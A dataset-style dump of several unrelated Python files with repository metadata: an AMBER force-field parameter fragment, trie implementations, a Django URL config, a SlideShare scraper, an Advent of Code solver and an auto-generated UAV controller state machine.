        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('HC', 'CT', metcar), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('HC', 'CT', hydhyd), cal(p['H_C_H'][0], p['H_C_H'][0], i), cal(p['H_C_H'][1], p['H_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd, 'CT', metcar), cal(p['Close'][0], p['Close'][0], i), cal(p['Close'][1], p['Close'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', hydhyd), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
        # Dihedrals fade toward the dummy-state terms.
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'CT', metcar, methyd), cal(p['C_C_C_H'][0], p['0_1'][0], i), cal(p['C_C_C_H'][1], p['0_1'][1], i), cal(p['C_C_C_H'][2], p['0_1'][2], i), cal(p['C_C_C_H'][3], p['0_1'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('HC', 'CT', metcar, methyd), cal(p['H_C_C_H'][0], p['0_1'][0], i), cal(p['H_C_C_H'][1], p['0_1'][1], i), cal(p['H_C_C_H'][2], p['0_1'][2], i), cal(p['H_C_C_H'][3], p['0_1'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd, 'CT', metcar, methyd), cal(p['0_Dihe'][0], p['0_Dihe'][0], i), cal(p['0_Dihe'][1], p['0_Dihe'][1], i), cal(p['0_Dihe'][2], p['0_Dihe'][2], i), cal(p['0_Dihe'][3], p['0_Dihe'][3], i))
        # Lennard-Jones terms interpolate between real and dummy well depths.
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), metcar, cal(p['CT'][2], p['0_C'][2], i), cal(p['CT'][3], p['0_C'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), methyd, cal(p['HC'][2], p['0_H'][2], i), cal(p['HC'][3], p['0_H'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, cal(p['0_H'][2], p['HC'][2], i), cal(p['0_H'][3], p['HC'][3], i))
| [
"[email protected]"
] | |
19e5b00f91bf0b3b5006b61638f0eaf93703a415 | cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98 | /leet/facebook/strings_arrays/implement_trie(prefix_tree).py | d2417b0002dda188bd8067925406649cf3692fca | [] | no_license | arsamigullin/problem_solving_python | 47715858a394ba9298e04c11f2fe7f5ec0ee443a | 59f70dc4466e15df591ba285317e4a1fe808ed60 | refs/heads/master | 2023-03-04T01:13:51.280001 | 2023-02-27T18:20:56 | 2023-02-27T18:20:56 | 212,953,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | # this solution is slow but looks right
# we declared TrieNode. It store list of TrieNodes inside of length 26
class TrieNode:
    """One node of a lowercase-ASCII trie: 26 child slots plus an end-of-word flag."""
    def __init__(self):
        # Child slot per letter 'a'..'z'; None marks an absent edge.
        self.links = [None] * 26
        # Set once a complete word terminates at this node.
        self.end = False
    def get(self, char):
        """Return the child node reached via *char*, or None if absent."""
        return self.links[ord(char) - ord('a')]
    def contains(self, char):
        """True when a child edge exists for *char*."""
        return self.get(char) is not None
    def put(self, char, node):
        """Attach *node* as the child for *char* (overwrites any existing child)."""
        self.links[ord(char) - ord('a')] = node
    def is_end(self):
        """True when an inserted word ends at this node."""
        return self.end
    def set_end(self):
        """Mark that an inserted word ends at this node."""
        self.end = True
class Trie:
    """Prefix tree over lowercase ASCII words, built from TrieNode objects."""
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.root = TrieNode()
    def insert(self, word: str) -> None:
        """
        Inserts a word into the trie.
        """
        cursor = self.root
        for letter in word:
            child = cursor.get(letter)
            if child is None:
                child = TrieNode()
                cursor.put(letter, child)
            cursor = child
        cursor.set_end()
    def __walk(self, prefix):
        """Follow *prefix* from the root; return the final node, or None if the path breaks."""
        cursor = self.root
        for letter in prefix:
            if not cursor.contains(letter):
                return None
            cursor = cursor.get(letter)
        return cursor
    def search(self, word: str) -> bool:
        """
        Returns if the word is in the trie.
        """
        tail = self.__walk(word)
        return tail is not None and tail.is_end()
    def startsWith(self, prefix: str) -> bool:
        """
        Returns if there is any word in the trie that starts with the given prefix.
        """
        return self.__walk(prefix) is not None
# Your Trie object will be instantiated and called as such:
# obj = Trie()
# obj.insert(word)
# param_2 = obj.search(word)
# param_3 = obj.startsWith(prefix)
# This alternative is much faster in practice; it uses nested dicts instead of fixed-size child arrays
class TrieDict:
    """Trie implemented with nested dicts; a '#' sentinel key marks the end of a word.

    Each level is a single hash lookup, which is faster in practice than the
    26-slot array variant.  For example, after inserting "abcc" and "abccd"
    the structure is:
        {'a': {'b': {'c': {'c': {'#': '#', 'd': {'#': '#'}}}}}}
    The sentinel lets search() distinguish a complete word from a mere prefix.
    """
    # Sentinel key marking word termination; never a real letter.
    _END = '#'
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.root = dict()
    def insert(self, word: str) -> None:
        """
        Inserts a word into the trie.
        """
        node = self.root
        for ch in word:
            # setdefault walks to the child, creating it on first sight.
            node = node.setdefault(ch, {})
        node[self._END] = self._END
        # NOTE: the original left a debug `print(self.root)` here, dumping the
        # whole trie on every insert; removed.
    def _descend(self, s):
        """Follow *s* from the root; return the final dict node, or None if the path breaks."""
        node = self.root
        for ch in s:
            if ch not in node:
                return None
            node = node[ch]
        return node
    def search(self, word: str) -> bool:
        """
        Returns if the word is in the trie.
        """
        node = self._descend(word)
        return node is not None and self._END in node
    def startsWith(self, prefix: str) -> bool:
        """
        Returns if there is any word in the trie that starts with the given prefix.
        """
        return self._descend(prefix) is not None
if __name__ == "__main__":
    # Quick manual smoke test: inserting a word and then a longer word that
    # extends it exercises the end-of-word sentinel handling in TrieDict.
    s = TrieDict()
    s.insert("abcc")
    s.insert("abccd")
| [
"[email protected]"
] | |
bd99ee4471270f22b8beb7ca1b17ae9959c13aaf | 5b39000731517e9e77db789f2d253fd8dd1bbcda | /gamesapi/gamesapi/urls.py | e87a1ec8d70bd1ded577a1eb37dcf1bfc7176ec9 | [] | no_license | bunnycast/RestAPI | 831a01c592ff91bebb410f060aaa8f19c7b40361 | 1f2b6837342a04c59752119eebb16a7eeeecaa4c | refs/heads/master | 2022-11-16T21:25:26.485393 | 2020-07-20T03:12:52 | 2020-07-20T03:12:52 | 276,662,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 910 | py | """gamesapi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
    path('admin/', admin.site.urls),
    # NOTE(review): r'^' matches every path, so requests are tried against
    # games.urls first; Django only falls through to the api-auth entry below
    # when no pattern inside games.urls matches.  Confirm games.urls has no
    # catch-all of its own, otherwise api-auth is unreachable.
    url(r'^', include('games.urls')),
    url(r'^api-auth/', include('rest_framework.urls')),  # DRF browsable-API login/logout
]
| [
"[email protected]"
] | |
37c1b77dd3586311b40f194e2b54e9d3196a58e6 | f874b3bffdf98ea52a12f9cd08566557e33d4c98 | /extract_info.py | 661aedd6a01faa476fa02e92316332480fa98e79 | [
"Apache-2.0"
] | permissive | lmorillas/recursoscaa | 8e567246f722a38a7fb61dd6a884fd0d153cd338 | bac2ff39d67028ca8d4969d23f5061f09be59a0e | refs/heads/master | 2018-12-28T00:24:31.042017 | 2015-08-29T08:13:23 | 2015-08-29T08:13:23 | 32,229,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,684 | py | from amara.bindery import html
from amara.lib import U
from urlparse import urljoin
# First two pages of the author's SlideShare listing (the site paginates).
doc = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations')
doc2 = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations/2')
links = []  # thumbnail <a> nodes collected from the listing pages
datos = []  # per-presentation metadata dicts, filled in below
def extract_links(doc):
    """Return the <a> nodes of every presentation thumbnail on a listing page."""
    thumbnail_anchors = '//ul[@class="thumbnailFollowGrid"]/li//a'
    return doc.xml_select(thumbnail_anchors)
# Gather every presentation anchor from both listing pages.
links.extend(extract_links(doc))
links.extend(extract_links(doc2))
print len(links), 'recursos a extraer ...'
def encode_data(d):
    """UTF-8 encode every value of *d* in place and return the same dict."""
    for key in list(d):
        d[key] = d[key].encode('utf-8')
    return d
def extract_data(link):
item = {}
_link = urljoin('http://es.slideshare.net/', U(link.href))
_doc = html.parse(_link)
if doc:
print _link
item['url'] = _link
item['id'] = _link.split('/')[-1]
item['autor'] = []
_label = U(_doc.xml_select('//h1[contains(@class, "slideshow-title-text")]')).strip()
if u'Romero' in _label:
item['autor'].append('David Romero')
item['autor'].append(U(_doc.xml_select('//a[@class="j-author-name"]')).strip())
item['label'] = _label.split('-')[0].strip()
item['fecha'] = U(_doc.xml_select('//time[@itemprop="datePublished"]')).strip()
_desc = U(_doc.xml_select('//p[contains(@class, "j-desc-expand")]')).strip()
if _desc:
item['desc'] = _desc
else:
item['desc'] = U(_doc.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
item['imagen'] = _doc.xml_select(u'//img[contains(@class, "slide_image")]')[0].src
return item
# Scrape every collected link, then persist the results.
datos = [extract_data(l) for l in links]
import json
# Use a context manager so the output file is flushed and closed (the
# original left the handle returned by open() dangling).
with open('datos.json', 'w') as out:
    json.dump({'items': datos}, out)
'''
d2 = html.parse(urljoin('http://es.slideshare.net/', l)
print d2.xml_encode()
d2.xml_select('//time')
map(d2.xml_select('//time'), lambda x: print x)
map( lambda x: print x, d2.xml_select('//time'))
lambda x: print x
__version__
version
_version_
print d2.xml_select('//time')[0]
print d2.xml_select('//time')[1]
print d2.xml_select('//time[@itemprop="datePublished"]')
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//a[@class="j-author-name"]/text()')
print d2.xml_select('//a[@class="j-author-name"]')
print d2.xml_select('//a[@class="j-author-name"]')
from amara.lib import U
print U(d2.xml_select('//a[@class="j-author-name"]')).strip()
print U(d2.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
print U(d2.xml_select('//a[contains(@class, "j-download")]')).strip()
history
''' | [
"[email protected]"
] | |
d7043a83bf47e5a0fc3d1216e5b5cab408f81ede | 11a246743073e9d2cb550f9144f59b95afebf195 | /advent/2017/day8.py | 6b9e3586e8658bcf41dbd5263b00183231315b58 | [] | no_license | ankitpriyarup/online-judge | b5b779c26439369cedc05c045af5511cbc3c980f | 8a00ec141142c129bfa13a68dbf704091eae9588 | refs/heads/master | 2020-09-05T02:46:56.377213 | 2019-10-27T20:12:25 | 2019-10-27T20:12:25 | 219,959,932 | 0 | 1 | null | 2019-11-06T09:30:58 | 2019-11-06T09:30:57 | null | UTF-8 | Python | false | false | 574 | py | from collections import *
import itertools
import random
import sys
def main():
d = defaultdict(int)
ans = -19
for line in sys.stdin:
words = line.strip().split()
d_reg = words[0]
sgn = 1 if words[1] == 'inc' else -1
amt = int(words[2])
reg = words[4]
e = words[5]
amt2 = int(words[6])
val = d[reg]
if eval(str(val) + ' ' + e + ' ' + str(amt2)):
d[d_reg] += sgn * amt
# ans = max(ans, (max(v for k, v in d.items())))
print(max(v for k, v in d.items()))
main()
| [
"[email protected]"
] | |
ef5631e014a978f3699b26c20792af4d65ded2c5 | c6c002d37878c78f9199e30a6d0c2127257552e0 | /ctrls/Goal6_8/G6_8Pos7_1Ori2.py | ffd26bb34a11c4d3f06839ccabb29ad14464f64e | [] | no_license | carrilloec12/FireUAVs | 900a79810a5d610dc467fe82fa276bb14b7ffe9d | 019f12a947fa4d5bcc99d20ccb85925160430370 | refs/heads/master | 2020-03-21T08:03:10.478162 | 2018-06-22T15:09:50 | 2018-06-22T15:09:50 | 138,316,479 | 0 | 0 | null | 2018-06-22T15:06:54 | 2018-06-22T15:06:54 | null | UTF-8 | Python | false | false | 24,090 | py | class TulipStrategy(object):
"""Mealy transducer.
Internal states are integers, the current state
is stored in the attribute "state".
To take a transition, call method "move".
The names of input variables are stored in the
attribute "input_vars".
Automatically generated by tulip.dumpsmach on 2018-06-21 17:12:48 UTC
To learn more about TuLiP, visit http://tulip-control.org
"""
def __init__(self):
self.state = 17
self.input_vars = ['Fire', 'StopSignal']
def move(self, Fire, StopSignal):
"""Given inputs, take move and return outputs.
@rtype: dict
@return: dictionary with keys of the output variable names:
['sys_actions', 'loc', 'Base', 'GoalPos']
"""
output = dict()
if self.state == 0:
if (Fire == False) and (StopSignal == False):
self.state = 1
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 2
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 3
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == True):
self.state = 4
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 1:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 2:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 3:
if (Fire == True) and (StopSignal == True):
self.state = 16
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == False):
self.state = 13
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 14
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 15
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 4:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 5:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 6:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 7:
if (Fire == False) and (StopSignal == False):
self.state = 9
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 10
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 11
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 12
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 8:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 9:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 10:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 11:
if (Fire == False) and (StopSignal == False):
self.state = 9
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 10
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 11
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 12
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 12:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 13:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 14:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 15:
if (Fire == True) and (StopSignal == True):
self.state = 16
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == False):
self.state = 13
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 14
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 15
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 16:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 17:
if (Fire == False) and (StopSignal == False):
self.state = 0
output["loc"] = 'Pos7_1Ori2'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 2
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 3
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == True):
self.state = 4
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 10
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 11
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 12
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 14
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 15
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 16
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
else:
raise Exception("Unrecognized internal state: " + str(self.state))
return output
def _error(self, Fire, StopSignal):
raise ValueError("Unrecognized input: " + (
"Fire = {Fire}; "
"StopSignal = {StopSignal}; ").format(
Fire=Fire,
StopSignal=StopSignal))
| [
"[email protected]"
] | |
ac0f764daad78adf59a5a4d76ef3847794467db5 | a86dd51331fe333d2ad5ad6e88cec8e2993b1b56 | /nodeconfeu_watch/convert/__init__.py | 63c2729139fbef6bd859bc44be1c6c337840f758 | [
"Apache-2.0"
] | permissive | paulcockrell/nodeconfeu-gesture-models | 792c5ae6ce0153964c05372ccf14d579922c5976 | db645fa914bdc634d5888d40b2d5d75262506ccd | refs/heads/master | 2022-08-28T21:10:17.452641 | 2020-05-15T15:47:30 | 2020-05-15T15:47:30 | 264,165,155 | 0 | 0 | NOASSERTION | 2020-05-15T10:29:57 | 2020-05-15T10:29:56 | null | UTF-8 | Python | false | false | 40 | py |
from .export_tflite import ExportModel
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.